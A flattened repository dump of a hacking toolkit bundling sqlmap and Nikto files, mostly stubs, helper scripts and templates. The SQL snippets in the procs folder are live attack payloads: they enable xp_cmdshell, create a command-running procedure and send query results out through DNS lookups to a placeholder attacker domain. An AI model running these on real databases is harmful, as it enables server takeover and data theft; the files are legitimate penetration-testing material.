/tools/sqli/extra/runcmd/windows/README.txt: -------------------------------------------------------------------------------- 1 | Compile only the Release version because the Runtime library option 2 | (Project Properties -> Configuration Properties -> C/C++ -> Code 3 | Generation) is set to "Multi-threaded (/MT)", which statically links 4 | everything into executable and doesn't compile Debug version at all. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/runcmd/windows/runcmd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // runcmd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/safe2bin/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/shellcodeexec/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/inquisb/shellcodeexec. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x32_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x32_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x64_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x64_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/shellcodeexec/windows/shellcodeexec.x32.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/shutils/blanks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Removes trailing spaces from blank lines inside project files 7 | find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/shutils/pep8.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pep8 on all python files (prerequisite: apt-get install pep8) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/shutils/pyflakes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/sqlharvest/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/plugins/dbms/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/plugins/dbms/db2/filesystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem 9 | 10 | class Filesystem(GenericFilesystem): 11 | def __init__(self): 12 | GenericFilesystem.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/plugins/dbms/db2/takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.takeover import Takeover as GenericTakeover 9 | 10 | class Takeover(GenericTakeover): 11 | def __init__(self): 12 | self.__basedir = None 13 | self.__datadir = None 14 | 15 | GenericTakeover.__init__(self) 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/plugins/dbms/mysql/enumeration.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.enumeration import Enumeration as GenericEnumeration 9 | 10 | class Enumeration(GenericEnumeration): 11 | def __init__(self): 12 | GenericEnumeration.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/plugins/generic/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder represent SQL snippets used by sqlmap on the target 2 | system. 3 | They are licensed under the terms of the GNU Lesser General Public License 4 | where not specified otherwise. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/activate_sp_oacreate.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'ole automation procedures',1; 4 | RECONFIGURE WITH OVERRIDE 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/configure_openrowset.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options', 1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options', 0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/configure_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options',0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/create_new_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | DECLARE @%RANDSTR% nvarchar(999); 2 | set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; 3 | EXEC master..sp_executesql @%RANDSTR% 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/disable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_dropextendedproc 'xp_cmdshell' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/dns_request.sql: -------------------------------------------------------------------------------- 1 | DECLARE @host varchar(1024); 2 | SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; 3 | EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') 4 | # or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/enable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mssqlserver/run_statement_as_user.sql: -------------------------------------------------------------------------------- 1 | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 2 | # SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') 3 | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mysql/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/mysql/write_file_limit.sql: -------------------------------------------------------------------------------- 1 | LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/oracle/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 2 | # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 3 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/procs/postgresql/dns_request.sql: -------------------------------------------------------------------------------- 1 | DROP TABLE IF EXISTS %RANDSTR1%; 2 | CREATE TABLE %RANDSTR1%(%RANDSTR2% text); 3 | CREATE OR REPLACE FUNCTION %RANDSTR3%() 4 | RETURNS VOID AS $$ 5 | DECLARE %RANDSTR4% TEXT; 6 | DECLARE %RANDSTR5% TEXT; 7 | BEGIN 8 | SELECT INTO %RANDSTR5% (%QUERY%); 9 | %RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\''; 10 | EXECUTE %RANDSTR4%; 11 | END; 12 | $$ LANGUAGE plpgsql SECURITY DEFINER; 13 | SELECT %RANDSTR3%(); -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/backdoor.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/backdoor.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/backdoor.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/backdoor.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/backdoor.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/backdoor.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/backdoor.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/backdoor.php_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/runcmd.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/runcmd.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/stager.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/stager.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/stager.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/stager.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/stager.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/stager.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/shell/stager.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/shell/stager.php_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/tamper/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/thirdparty/bottle/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/thirdparty/oset/__init__.py: -------------------------------------------------------------------------------- 1 | """Main Ordered Set module """ 2 | 3 | from pyoset import oset 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/txt/wordlist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/txt/wordlist.zip -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/sqlmapproject/udfhack. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/mysql/linux/32/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/mysql/linux/32/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/mysql/linux/64/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/mysql/linux/64/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/mysql/windows/32/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/mysql/windows/64/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/waf/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/waf/proventia.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "Proventia Web Application Security (IBM)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if page is None: 13 | return False 14 | page, headers, code = get_page(url="/Admin_Files/") 15 | return page is None 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/waf/webappsecure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "webApp.secure (webScurity)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if code == 403: 13 | return False 14 | page, headers, code = get_page(get="nx=@@") 15 | return code == 403 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/xml/banner/oracle.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/xml/banner/sharepoint.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/xml/banner/x-aspnet-version.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/databases/db_outdated: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/vscan/databases/db_outdated -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/docs/nikto_manual.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/vscan/docs/nikto_manual.html -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/htm_close.tmpl: -------------------------------------------------------------------------------- 1 |

© 2008 CIRT, Inc.

2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/htm_host_im.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
Information#TEMPL_SMMSG#
OSVDB EntriesOSVDB-#TEMPL_OSVDB#
11 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/htm_stop.tmpl: -------------------------------------------------------------------------------- 1 |

© 2007 CIRT, Inc.

2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/xml_close.tmpl: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/xml_end.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/xml_host_head.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | #TEMPL_SSL_INFO# 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/xml_host_im.tmpl: -------------------------------------------------------------------------------- 1 | 2 | #TEMPL_SMMSG# 3 | 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/xml_host_item.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/vscan/templates/xml_start.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | --------------------------------------------------------------------------------